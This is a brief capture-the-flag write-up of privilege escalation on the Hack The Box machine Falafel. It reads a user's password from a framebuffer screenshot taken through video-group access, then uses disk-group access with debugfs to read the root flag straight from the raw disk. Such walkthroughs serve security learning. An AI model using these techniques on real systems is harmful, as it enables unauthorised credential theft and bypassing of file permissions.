HTB Falafel privilege escalation writeup
·1 min
User moshe is in video group
$ id
uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games)
Frame buffer (/dev/fb0) belongs to video group
$ ls -lah /dev/fb0
crw-rw---- 1 root video 29, 0 Jun 24 09:32 /dev/fb0
Dump framebuffer
$ cat /dev/fb0 > .ayamkambing
Transfer the dump to your machine and find a way to convert the raw framebuffer to image.
I use this - fb2png
That tool only take /dev/fb0 as input so I copied the dump to my own framebuffer first
[[email protected] ~]$ cat ../.ayamkambing > /dev/fb0
[[email protected] ~]$ ./fb2png
You’ll get a screenshot of the current screen and user yossi’s password is shown. Use su
to switch to user yossi (or SSH as yossi)
$ su - yossi
Password:
[email protected]:~$
Yossi is in disk group
[email protected]:~$ id
uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare)
Initially I tried to dump the whole /dev/sda1 but greeted with disk full error. Thanks to https://unix.stackexchange.com/questions/90996/ls-on-device-without-mounting-it, I learnt that you can use debugfs to run command on raw disk.
[email protected]:~$ /sbin/debugfs -R "cat /root/root.txt" /dev/sda1
debugfs 1.42.13 (17-May-2015)
23b7920*************f2091c001fa1
Yay!